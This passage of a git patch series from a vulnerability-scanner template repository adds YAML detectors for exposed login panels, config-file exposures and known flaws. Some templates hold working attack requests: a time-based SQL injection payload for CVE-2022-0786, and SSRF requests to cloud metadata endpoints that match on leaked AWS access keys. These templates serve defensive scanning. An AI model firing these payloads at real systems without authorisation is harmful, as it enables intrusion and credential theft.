"{{BaseURL}}/accounts/login/?next=/" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'Modoboa' + case-insensitive: true + + - type: status + status: + - 200 + From 089f6e686786f0ec7468da03691345836504a101 Mon Sep 17 00:00:00 2001 From: kh4sh3i Date: Sat, 17 Dec 2022 23:19:06 +0330 Subject: [PATCH 0501/1133] Update modoboa-panel.yaml --- exposed-panels/modoboa-panel.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/exposed-panels/modoboa-panel.yaml b/exposed-panels/modoboa-panel.yaml index e6bead500a..941e860520 100644 --- a/exposed-panels/modoboa-panel.yaml +++ b/exposed-panels/modoboa-panel.yaml @@ -35,4 +35,3 @@ requests: - type: status status: - 200 - From 514b99125139884170aed247324cb458501897d8 Mon Sep 17 00:00:00 2001 From: kh4sh3i Date: Sun, 18 Dec 2022 00:24:48 +0330 Subject: [PATCH 0502/1133] storybook panel --- exposed-panels/storybook-panel.yaml | 37 +++++++++++++++++++++++++++++ 1 file changed, 37 insertions(+) create mode 100644 exposed-panels/storybook-panel.yaml diff --git a/exposed-panels/storybook-panel.yaml b/exposed-panels/storybook-panel.yaml new file mode 100644 index 0000000000..969146369e --- /dev/null +++ b/exposed-panels/storybook-panel.yaml @@ -0,0 +1,37 @@ +id: storybook-panel + +info: + name: Storybook Login Panel - Detect + author: kh4sh3i + severity: info + description: | + Storybook login panel was detected. + reference: + - https://storybook.js.org/ + + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 + metadata: + verified: true + shodan-query: http.html:"storybook" + tags: panel,storybook,workshop + +requests: + - method: GET + path: + - "{{BaseURL}}/?path=/settings/about" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'Storybook' + case-insensitive: true + + - type: status + status: + - 200 + From 825a990452a97d3b928f160ced68211a4dbe525b Mon Sep 17 00:00:00 2001 From: kh4sh3i Date: Sun, 18 Dec 2022 00:25:37 +0330 Subject: [PATCH 0503/1133] Update storybook-panel.yaml --- exposed-panels/storybook-panel.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposed-panels/storybook-panel.yaml b/exposed-panels/storybook-panel.yaml index 969146369e..e91e6c8930 100644 --- a/exposed-panels/storybook-panel.yaml +++ b/exposed-panels/storybook-panel.yaml @@ -8,7 +8,7 @@ info: Storybook login panel was detected. reference: - https://storybook.js.org/ - + - https://github.com/storybookjs/storybook classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-score: 0.0 From 5d959da24b7397fc601bca9ca3771c9a509068c4 Mon Sep 17 00:00:00 2001 From: kh4sh3i Date: Sun, 18 Dec 2022 00:25:57 +0330 Subject: [PATCH 0504/1133] Update storybook-panel.yaml --- exposed-panels/storybook-panel.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/exposed-panels/storybook-panel.yaml b/exposed-panels/storybook-panel.yaml index e91e6c8930..e4db2d0ca1 100644 --- a/exposed-panels/storybook-panel.yaml +++ b/exposed-panels/storybook-panel.yaml @@ -34,4 +34,3 @@ requests: - type: status status: - 200 - From 0518611eb95b071a5e33f1225f6fefd708eaae83 Mon Sep 17 00:00:00 2001 From: kh4sh3i Date: Sun, 18 Dec 2022 00:33:46 +0330 Subject: [PATCH 0505/1133] Delete storybook-panel.yaml --- exposed-panels/storybook-panel.yaml | 36 ----------------------------- 1 file changed, 36 deletions(-) delete mode 100644 exposed-panels/storybook-panel.yaml diff --git a/exposed-panels/storybook-panel.yaml b/exposed-panels/storybook-panel.yaml deleted file mode 100644 index e4db2d0ca1..0000000000 --- a/exposed-panels/storybook-panel.yaml +++ /dev/null @@ -1,36 +0,0 @@ -id: storybook-panel - -info: - name: Storybook Login Panel - Detect - author: kh4sh3i - severity: info - description: | - Storybook login panel was detected. - reference: - - https://storybook.js.org/ - - https://github.com/storybookjs/storybook - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 - cwe-id: CWE-200 - metadata: - verified: true - shodan-query: http.html:"storybook" - tags: panel,storybook,workshop - -requests: - - method: GET - path: - - "{{BaseURL}}/?path=/settings/about" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - 'Storybook' - case-insensitive: true - - - type: status - status: - - 200 From 7401f5fec921da8bd6d5a832fe569030dcbdb265 Mon Sep 17 00:00:00 2001 From: kh4sh3i Date: Sun, 18 Dec 2022 00:36:55 +0330 Subject: [PATCH 0506/1133] Add files via upload --- exposed-panels/storybook-panel.yaml | 36 +++++++++++++++++++++++++++++ 1 file changed, 36 insertions(+) create mode 100644 exposed-panels/storybook-panel.yaml diff --git a/exposed-panels/storybook-panel.yaml b/exposed-panels/storybook-panel.yaml new file mode 100644 index 0000000000..6949fe8412 --- /dev/null +++ b/exposed-panels/storybook-panel.yaml @@ -0,0 +1,36 @@ +id: storybook-panel + +info: + name: Storybook Login Panel - Detect + author: kh4sh3i + severity: info + description: | + Storybook login panel was detected. + reference: + - https://storybook.js.org/ + - https://github.com/storybookjs/storybook + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 + metadata: + verified: true + shodan-query: http.html:"storybook" + tags: panel,storybook,workshop + +requests: + - method: GET + path: + - "{{BaseURL}}/?path=/settings/about" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'Storybook' + case-insensitive: true + + - type: status + status: + - 200 \ No newline at end of file From 0970ef285e1618dc77aaddd9d0323a9d02f01c94 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 18 Dec 2022 13:03:50 +0530 Subject: [PATCH 0507/1133] Update ilias-panel.yaml --- exposed-panels/ilias-panel.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/exposed-panels/ilias-panel.yaml b/exposed-panels/ilias-panel.yaml index b199ed62ba..62b6b5c62d 100644 --- a/exposed-panels/ilias-panel.yaml +++ b/exposed-panels/ilias-panel.yaml @@ -16,6 +16,7 @@ requests: - "{{BaseURL}}/ilias/login.php" stop-at-first-match: true + matchers-condition: and matchers: - type: word words: From aca47e49b8b51a2c47a1bbdbbea06fed600e4f9e Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 18 Dec 2022 13:13:56 +0530 Subject: [PATCH 0508/1133] Update pega-web-panel.yaml --- exposed-panels/pega-web-panel.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/exposed-panels/pega-web-panel.yaml b/exposed-panels/pega-web-panel.yaml index b673b32d37..e8d12ec491 100644 --- a/exposed-panels/pega-web-panel.yaml +++ b/exposed-panels/pega-web-panel.yaml @@ -24,6 +24,7 @@ requests: - "{{BaseURL}}" - "{{BaseURL}}/prweb/PRAuth/app/default/" + stop-at-first-match: true host-redirects: true max-redirects: 2 matchers-condition: and From 6b45d0be7a8894b55d63b539eb07e20a1395e829 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sun, 18 Dec 2022 19:53:30 +0530 Subject: [PATCH 0509/1133] Create amazon-ec2-ssrf.yaml --- vulnerabilities/amazon/amazon-ec2-ssrf.yaml | 28 +++++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 vulnerabilities/amazon/amazon-ec2-ssrf.yaml diff --git a/vulnerabilities/amazon/amazon-ec2-ssrf.yaml b/vulnerabilities/amazon/amazon-ec2-ssrf.yaml new file mode 100644 index 0000000000..159802e3de --- /dev/null +++ b/vulnerabilities/amazon/amazon-ec2-ssrf.yaml @@ -0,0 +1,28 @@ +id: amazon-ec2-ssrf +info: + name: Amazon EC2 SSRF + author: DhiyaneshDk + severity: critical + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N + cvss-score: 9.3 + cwe-id: CWE-441 + metadata: + verified: "true" + shodan-query: "Server: EC2ws" + tags: aws,ec2,ssrf,amazon + +requests: + - raw: + - |+ + GET {{BaseURL}}/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance HTTP/1.1 + Host: {{Hostname}} + + unsafe: true + matchers: + - type: word + part: body + words: + - "AccessKeyId" + - "SecretAccessKey" + condition: and From dece342c2109b39db19f2e513cc1a12d11e6b1c8 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sun, 18 Dec 2022 22:23:05 +0530 Subject: [PATCH 0510/1133] Update amazon-ec2-ssrf.yaml --- vulnerabilities/amazon/amazon-ec2-ssrf.yaml | 12 +++++++++++- 1 file changed, 11 insertions(+), 1 deletion(-) diff --git a/vulnerabilities/amazon/amazon-ec2-ssrf.yaml b/vulnerabilities/amazon/amazon-ec2-ssrf.yaml index 159802e3de..3c769f6ce8 100644 --- a/vulnerabilities/amazon/amazon-ec2-ssrf.yaml +++ b/vulnerabilities/amazon/amazon-ec2-ssrf.yaml @@ -1,4 +1,5 @@ id: amazon-ec2-ssrf + info: name: Amazon EC2 SSRF author: DhiyaneshDk @@ -8,7 +9,6 @@ info: cvss-score: 9.3 cwe-id: CWE-441 metadata: - verified: "true" shodan-query: "Server: EC2ws" tags: aws,ec2,ssrf,amazon @@ -18,7 +18,13 @@ requests: GET {{BaseURL}}/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance HTTP/1.1 Host: {{Hostname}} + - |+ + GET http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance HTTP/1.1 + Host: {{Hostname}} + + stop-at-first-match: true unsafe: true + matchers-condition: and matchers: - type: word part: body @@ -26,3 +32,7 @@ requests: - "AccessKeyId" - "SecretAccessKey" condition: and + + - type: status + status: + - 200 From 36d51a365fee0b701017224c42dbe0d0878f057d Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 19 Dec 2022 10:57:35 +0000 Subject: [PATCH 0511/1133] Auto Generated New Template Addition List [Mon Dec 19 10:57:35 UTC 2022] :robot: --- .new-additions | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.new-additions b/.new-additions index 681c2b8c83..32f111c5f2 100644 --- a/.new-additions +++ b/.new-additions @@ -42,6 +42,7 @@ misconfiguration/unauth-zwave-mqtt.yaml misconfiguration/vernemq-status-page.yaml network/detection/cisco-finger-detect.yaml network/detection/finger-detect.yaml +network/detection/mysql-detect.yaml network/detection/redis-detect.yaml network/detection/rpcbind-portmapper-detect.yaml takeovers/leadpages-takeover.yaml @@ -53,3 +54,4 @@ vulnerabilities/nps/nps-auth-bypass.yaml vulnerabilities/qibocms-file-download.yaml vulnerabilities/vmware/vmware-nsx-stream-rce.yaml vulnerabilities/zend/zend-v1-xss.yaml +vulnerabilities/zyxel/unauth-lfd-zhttpd.yaml From 6f35b22cc121e4dcfbbfecb340f473c4d3812c96 Mon Sep 17 00:00:00 2001 From: Aman Rawat Date: Mon, 19 Dec 2022 18:53:58 +0530 Subject: [PATCH 0512/1133] Added template for CVE-2022-0786 --- cves/2022/CVE-2022-0786.yaml | 36 ++++++++++++++++++++++++++++++++++++ 1 file changed, 36 insertions(+) create mode 100644 cves/2022/CVE-2022-0786.yaml diff --git a/cves/2022/CVE-2022-0786.yaml b/cves/2022/CVE-2022-0786.yaml new file mode 100644 index 0000000000..1844dee47a --- /dev/null +++ b/cves/2022/CVE-2022-0786.yaml @@ -0,0 +1,36 @@ +id: CVE-2022-0786 + +info: + name: KiviCare < 2.3.9 - Unauthenticated SQLi + author: theamanrawat + severity: critical + description: | + The plugin does not sanitise and escape some parameters before using them in SQL statements via the ajax_post AJAX action with the get_doctor_details route, leading to SQL Injections exploitable by unauthenticated users. + reference: + - https://wpscan.com/vulnerability/53f493e9-273b-4349-8a59-f2207e8f8f30 + - https://wordpress.org/plugins/kivicare-clinic-management-system/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-0786 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-0786 + cwe-id: CWE-89 + metadata: + verified: "true" + tags: cve,cve2022,sqli,wpscan,wordpress,wp-plugin,wp,kivicare-clinic-management-system,unauth + +requests: + - raw: + - | + @timeout: 10s + GET /wp-admin/admin-ajax.php?action=ajax_get&route_name=get_doctor_details&clinic_id=%7B"id":"1"%7D&props_doctor_id=1,2)+AND+(SELECT+42+FROM+(SELECT(SLEEP(6)))b HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - 'duration>=6' + - 'status_code == 200' + - 'contains(content_type, "text/html")' + - 'contains(body, "Doctor details")' + condition: and \ No newline at end of file From 1d3b12ea8485c00479a31d58e94a773628d61e9e Mon Sep 17 00:00:00 2001 From: Mihhail Sokolov Date: Mon, 19 Dec 2022 15:56:12 +0100 Subject: [PATCH 0513/1133] Create gpc-json.yaml --- miscellaneous/gpc-json.yaml | 50 +++++++++++++++++++++++++++++++++++++ 1 file changed, 50 insertions(+) create mode 100644 miscellaneous/gpc-json.yaml diff --git a/miscellaneous/gpc-json.yaml b/miscellaneous/gpc-json.yaml new file mode 100644 index 0000000000..3e616bf16f --- /dev/null +++ b/miscellaneous/gpc-json.yaml @@ -0,0 +1,50 @@ +id: gpc-json + +info: + name: gpc.json file + author: MihhailSokolov + severity: info + description: The website defines a Global Privacy Control policy. + tags: misc,generic + +requests: + - method: GET + path: + - "{{RootURL}}/.well-known/gpc.json" + - "{{RootURL}}/gpc.json" + + stop-at-first-match: true + host-redirects: true + max-redirects: 2 + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "gpc" + + - type: dsl + dsl: + - "len(body) <= 1024 && len(body) > 0" + + extractors: + - type: json + part: body + name: gpc-value + json: + - ".gpc" + + - type: json + part: body + name: gpc-last-update + json: + - ".lastUpdate?" + + - type: json + part: body + name: gpc-version + json: + - ".version?" From d82d0ec613b41c80860591ebba2ad40ffe75e8f2 Mon Sep 17 00:00:00 2001 From: Mihhail Sokolov Date: Mon, 19 Dec 2022 16:26:14 +0100 Subject: [PATCH 0514/1133] Update gpc-json.yaml --- miscellaneous/gpc-json.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/miscellaneous/gpc-json.yaml b/miscellaneous/gpc-json.yaml index 3e616bf16f..4979e87f0b 100644 --- a/miscellaneous/gpc-json.yaml +++ b/miscellaneous/gpc-json.yaml @@ -36,13 +36,13 @@ requests: name: gpc-value json: - ".gpc" - + - type: json part: body name: gpc-last-update json: - ".lastUpdate?" - + - type: json part: body name: gpc-version From 4f2e054f2e21f2dc7490cd70ff08ce7b26aa7778 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 19 Dec 2022 16:46:02 +0000 Subject: [PATCH 0515/1133] Auto README Update [Mon Dec 19 16:46:02 UTC 2022] :robot: --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index f8f3e9f053..f6185d557e 100644 --- a/README.md +++ b/README.md @@ -53,7 +53,7 @@ An overview of the nuclei template project, including statistics on unique tags, | wp-plugin | 366 | ritikchaddha | 164 | default-logins | 116 | | | | | | tech | 360 | princechaddha | 153 | file | 78 | | | | | -**321 directories, 4736 files**. +**328 directories, 4791 files**. From fba897db97ebce874dc70960dffa357ee9e38bc3 Mon Sep 17 00:00:00 2001 From: Hardik Solanki <49536512+HardikSolanki96@users.noreply.github.com> Date: Mon, 19 Dec 2022 22:35:57 +0000 Subject: [PATCH 0516/1133] Create xfinity-panel.yml --- exposed-panels/xfinity-panel.yml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 exposed-panels/xfinity-panel.yml diff --git a/exposed-panels/xfinity-panel.yml b/exposed-panels/xfinity-panel.yml new file mode 100644 index 0000000000..2a773bd8cf --- /dev/null +++ b/exposed-panels/xfinity-panel.yml @@ -0,0 +1,27 @@ +id: xfinity-panel + +info: + name: xfinity Panel + author: Hardik-Solanki + severity: info + metadata: + shodan-query: title:"xfinity" + tags: panel,xfinity + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'XFINITY' + - 'Gateway > Login' + condition: and + + - type: status + status: + - 200 From b318468220340e7d2389707bd6138125ad652e9b Mon Sep 17 00:00:00 2001 From: Hardik Solanki <49536512+HardikSolanki96@users.noreply.github.com> Date: Mon, 19 Dec 2022 22:38:38 +0000 Subject: [PATCH 0517/1133] Add files via upload --- iot/carel-platvisor-panel.yml | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 iot/carel-platvisor-panel.yml diff --git a/iot/carel-platvisor-panel.yml b/iot/carel-platvisor-panel.yml new file mode 100644 index 0000000000..08fb91e3e6 --- /dev/null +++ b/iot/carel-platvisor-panel.yml @@ -0,0 +1,25 @@ +id: carel-platvisor-panel + +info: + name: CAREL Pl@ntVisor Panel + author: Hardik-Solanki + severity: info + metadata: + shodan-query: title:"CAREL Pl@ntVisor" + tags: scada,iot,panels,carel + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'CAREL Pl@ntVisor' + + - type: status + status: + - 200 \ No newline at end of file From c81a7dc1ae0f023509753d3abbdb8b713578d942 Mon Sep 17 00:00:00 2001 From: Hardik Solanki <49536512+HardikSolanki96@users.noreply.github.com> Date: Mon, 19 Dec 2022 22:41:14 +0000 Subject: [PATCH 0518/1133] Create hue-personal-wireless-panel.yml --- iot/hue-personal-wireless-panel.yml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 iot/hue-personal-wireless-panel.yml diff --git a/iot/hue-personal-wireless-panel.yml b/iot/hue-personal-wireless-panel.yml new file mode 100644 index 0000000000..4240f7b282 --- /dev/null +++ b/iot/hue-personal-wireless-panel.yml @@ -0,0 +1,27 @@ +id: hue-personal-wireless-panel + +info: + name: HUE personal wireless lighting Panel + author: Hardik-Solanki + severity: info + metadata: + shodan-query: http.title:"hue personal wireless lighting" + tags: hue,iot,wireless + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'hue personal wireless lighting' + - 'Open Source' + condition: and + + - type: status + status: + - 200 From 4cb87862a6c38fa22299304cf5361fab24895c2b Mon Sep 17 00:00:00 2001 From: Hardik Solanki <49536512+HardikSolanki96@users.noreply.github.com> Date: Mon, 19 Dec 2022 22:46:52 +0000 Subject: [PATCH 0519/1133] Create cloud-config.yml --- exposures/configs/cloud-config.yml | 28 ++++++++++++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 exposures/configs/cloud-config.yml diff --git a/exposures/configs/cloud-config.yml b/exposures/configs/cloud-config.yml new file mode 100644 index 0000000000..c117e75a1b --- /dev/null +++ b/exposures/configs/cloud-config.yml @@ -0,0 +1,28 @@ +id: cloud-config + +info: + name: Cloud Config File Exposure + author: Hardik-Solanki + severity: medium + metadata: + verified: true + github-query: path:cloud-config.txt + tags: cloud,files,exposure + +requests: + - method: GET + path: + - '{{BaseURL}}/cloud-config.txt' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'ssh_authorized_keys:' + - 'packages:' + condition: and + + - type: status + status: + - 200 From 17a7893bc1fda1adbae62ea775f849c71a429da7 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 20 Dec 2022 09:40:47 +0530 Subject: [PATCH 0520/1133] Update xfinity-panel.yml --- exposed-panels/xfinity-panel.yml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/exposed-panels/xfinity-panel.yml b/exposed-panels/xfinity-panel.yml index 2a773bd8cf..b9c1477866 100644 --- a/exposed-panels/xfinity-panel.yml +++ b/exposed-panels/xfinity-panel.yml @@ -1,7 +1,7 @@ id: xfinity-panel info: - name: xfinity Panel + name: Xfinity Panel author: Hardik-Solanki severity: info metadata: @@ -18,9 +18,9 @@ requests: - type: word part: body words: - - 'XFINITY' - - 'Gateway > Login' - condition: and + - "alt='XFINITY'" + - "title='XFINITY'" + condition: or - type: status status: From a71a8287141cd124292fc3540881c0bf7ddf7cab Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 20 Dec 2022 09:46:36 +0530 Subject: [PATCH 0521/1133] Update and rename carel-platvisor-panel.yml to carel-plantvisor-panel.yaml --- ...el-platvisor-panel.yml => carel-plantvisor-panel.yaml} | 8 +++++--- 1 file changed, 5 insertions(+), 3 deletions(-) rename iot/{carel-platvisor-panel.yml => carel-plantvisor-panel.yaml} (70%) diff --git a/iot/carel-platvisor-panel.yml b/iot/carel-plantvisor-panel.yaml similarity index 70% rename from iot/carel-platvisor-panel.yml rename to iot/carel-plantvisor-panel.yaml index 08fb91e3e6..30b6c219e1 100644 --- a/iot/carel-platvisor-panel.yml +++ b/iot/carel-plantvisor-panel.yaml @@ -1,4 +1,4 @@ -id: carel-platvisor-panel +id: carel-plantvisor-panel info: name: CAREL Pl@ntVisor Panel @@ -6,7 +6,7 @@ info: severity: info metadata: shodan-query: title:"CAREL Pl@ntVisor" - tags: scada,iot,panels,carel + tags: panels,scada,iot,carel requests: - method: GET @@ -19,7 +19,9 @@ requests: part: body words: - 'CAREL Pl@ntVisor' + - 'alt="CAREL' + condition: or - type: status status: - - 200 \ No newline at end of file + - 200 From 115d02a5733a6d07ddc0bec2c122f6c2cca94b05 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 20 Dec 2022 09:46:47 +0530 Subject: [PATCH 0522/1133] Rename xfinity-panel.yml to xfinity-panel.yaml --- exposed-panels/{xfinity-panel.yml => xfinity-panel.yaml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename exposed-panels/{xfinity-panel.yml => xfinity-panel.yaml} (100%) diff --git a/exposed-panels/xfinity-panel.yml b/exposed-panels/xfinity-panel.yaml similarity index 100% rename from exposed-panels/xfinity-panel.yml rename to exposed-panels/xfinity-panel.yaml From 2bc4df7b04bbf54cd40cc60c10adc06f3e0f22bc Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 20 Dec 2022 09:49:38 +0530 Subject: [PATCH 0523/1133] Update and rename hue-personal-wireless-panel.yml to hue-personal-wireless-panel.yaml --- ...al-wireless-panel.yml => hue-personal-wireless-panel.yaml} | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) rename iot/{hue-personal-wireless-panel.yml => hue-personal-wireless-panel.yaml} (79%) diff --git a/iot/hue-personal-wireless-panel.yml b/iot/hue-personal-wireless-panel.yaml similarity index 79% rename from iot/hue-personal-wireless-panel.yml rename to iot/hue-personal-wireless-panel.yaml index 4240f7b282..48312122b8 100644 --- a/iot/hue-personal-wireless-panel.yml +++ b/iot/hue-personal-wireless-panel.yaml @@ -1,11 +1,11 @@ id: hue-personal-wireless-panel info: - name: HUE personal wireless lighting Panel + name: HUE Personal Wireless Lighting Panel author: Hardik-Solanki severity: info metadata: - shodan-query: http.title:"hue personal wireless lighting" + shodan-query: title:"hue personal wireless lighting" tags: hue,iot,wireless requests: From 8944e5d67480205e3088f08f3448172413f0ffb4 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 20 Dec 2022 09:54:10 +0530 Subject: [PATCH 0524/1133] Update and rename cloud-config.yml to cloud-config.yaml --- exposures/configs/{cloud-config.yml => cloud-config.yaml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename exposures/configs/{cloud-config.yml => cloud-config.yaml} (100%) diff --git a/exposures/configs/cloud-config.yml b/exposures/configs/cloud-config.yaml similarity index 100% rename from exposures/configs/cloud-config.yml rename to exposures/configs/cloud-config.yaml From 4d6f479d3b6d6392b53044f6ef74136a797b0ec7 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 20 Dec 2022 09:56:55 +0530 Subject: [PATCH 0525/1133] Update cloud-config.yaml --- exposures/files/cloud-config.yaml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/exposures/files/cloud-config.yaml b/exposures/files/cloud-config.yaml index 92d768a692..8ee6c0e892 100644 --- a/exposures/files/cloud-config.yaml +++ b/exposures/files/cloud-config.yaml @@ -1,8 +1,8 @@ id: cloud-config info: - name: Cloud Config Yaml - File Disclosure - author: DhiyaneshDK + name: Cloud Config File Exposure + author: DhiyaneshDK,Hardik-Solanki severity: medium reference: https://www.exploit-db.com/ghdb/7959 metadata: @@ -15,6 +15,7 @@ requests: path: - "{{BaseURL}}/cloud-config.yml" - "{{BaseURL}}/core-cloud-config.yml" + - '{{BaseURL}}/cloud-config.txt' stop-at-first-match: true matchers-condition: and From 916ac8c907c93fcc5508bbfc4cb8ebe27b2deeb2 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 20 Dec 2022 09:57:29 +0530 Subject: [PATCH 0526/1133] Delete cloud-config.yaml --- exposures/configs/cloud-config.yaml | 28 ---------------------------- 1 file changed, 28 deletions(-) delete mode 100644 exposures/configs/cloud-config.yaml diff --git a/exposures/configs/cloud-config.yaml b/exposures/configs/cloud-config.yaml deleted file mode 100644 index c117e75a1b..0000000000 --- a/exposures/configs/cloud-config.yaml +++ /dev/null @@ -1,28 +0,0 @@ -id: cloud-config - -info: - name: Cloud Config File Exposure - author: Hardik-Solanki - severity: medium - metadata: - verified: true - github-query: path:cloud-config.txt - tags: cloud,files,exposure - -requests: - - method: GET - path: - - '{{BaseURL}}/cloud-config.txt' - - matchers-condition: and - matchers: - - type: word - part: body - words: - - 'ssh_authorized_keys:' - - 'packages:' - condition: and - - - type: status - status: - - 200 From ab7f19491bf1344e4d2a746e3a4cad5417eb152e Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 20 Dec 2022 10:51:20 +0530 Subject: [PATCH 0527/1133] Create digital-ocean-ssrf.yaml --- vulnerabilities/other/digital-ocean-ssrf.yaml | 36 +++++++++++++++++++ 1 file changed, 36 insertions(+) create mode 100644 vulnerabilities/other/digital-ocean-ssrf.yaml diff --git a/vulnerabilities/other/digital-ocean-ssrf.yaml b/vulnerabilities/other/digital-ocean-ssrf.yaml new file mode 100644 index 0000000000..0f806ae067 --- /dev/null +++ b/vulnerabilities/other/digital-ocean-ssrf.yaml @@ -0,0 +1,36 @@ +id: digital-ocean-ssrf + +info: + name: Digital Ocean SSRF + author: DhiyaneshDk + severity: critical + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N + cvss-score: 9.3 + cwe-id: CWE-441 + + +requests: + - raw: + - |+ + GET {{BaseURL}}/metadata/v1.json HTTP/1.1 + Host: {{Hostname}} + + - |+ + GET http://169.254.169.254/metadata/v1.json HTTP/1.1 + Host: {{Hostname}} + + stop-at-first-match: true + unsafe: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"droplet_id":' + - '"hostname":' + condition: and + + - type: status + status: + - 200 From e9407f577aa7ef01cb169958b673d5654d441496 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 20 Dec 2022 12:04:40 +0530 Subject: [PATCH 0528/1133] Update gpc-json.yaml --- miscellaneous/gpc-json.yaml | 17 ++++++++++------- 1 file changed, 10 insertions(+), 7 deletions(-) diff --git a/miscellaneous/gpc-json.yaml b/miscellaneous/gpc-json.yaml index 4979e87f0b..0a5fa0a1c7 100644 --- a/miscellaneous/gpc-json.yaml +++ b/miscellaneous/gpc-json.yaml @@ -1,11 +1,14 @@ id: gpc-json info: - name: gpc.json file + name: Global Privacy Control (GPC) File Disclosure author: MihhailSokolov severity: info - description: The website defines a Global Privacy Control policy. - tags: misc,generic + description: | + The website defines a Global Privacy Control policy. + metadata: + verified: "true" + tags: misc,generic,gpc requests: - method: GET @@ -18,14 +21,14 @@ requests: max-redirects: 2 matchers-condition: and matchers: - - type: status - status: - - 200 - - type: word words: - "gpc" + - type: status + status: + - 200 + - type: dsl dsl: - "len(body) <= 1024 && len(body) > 0" From eefd44ce54741505837414606bdc7a7d83ea8012 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 20 Dec 2022 15:13:24 +0530 Subject: [PATCH 0529/1133] Update CVE-2022-0786.yaml --- cves/2022/CVE-2022-0786.yaml | 7 ++----- 1 file changed, 2 insertions(+), 5 deletions(-) diff --git a/cves/2022/CVE-2022-0786.yaml b/cves/2022/CVE-2022-0786.yaml index 1844dee47a..9024b1d7f7 100644 --- a/cves/2022/CVE-2022-0786.yaml +++ b/cves/2022/CVE-2022-0786.yaml @@ -11,13 +11,10 @@ info: - https://wordpress.org/plugins/kivicare-clinic-management-system/ - https://nvd.nist.gov/vuln/detail/CVE-2022-0786 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 cve-id: CVE-2022-0786 - cwe-id: CWE-89 metadata: verified: "true" - tags: cve,cve2022,sqli,wpscan,wordpress,wp-plugin,wp,kivicare-clinic-management-system,unauth + tags: cve,cve2022,wordpress,wp-plugin,wp,sqli,kivicare-clinic-management-system,unauth requests: - raw: @@ -33,4 +30,4 @@ requests: - 'status_code == 200' - 'contains(content_type, "text/html")' - 'contains(body, "Doctor details")' - condition: and \ No newline at end of file + condition: and From a4351f818705721da275916f02e841477cd49f25 Mon Sep 17 00:00:00 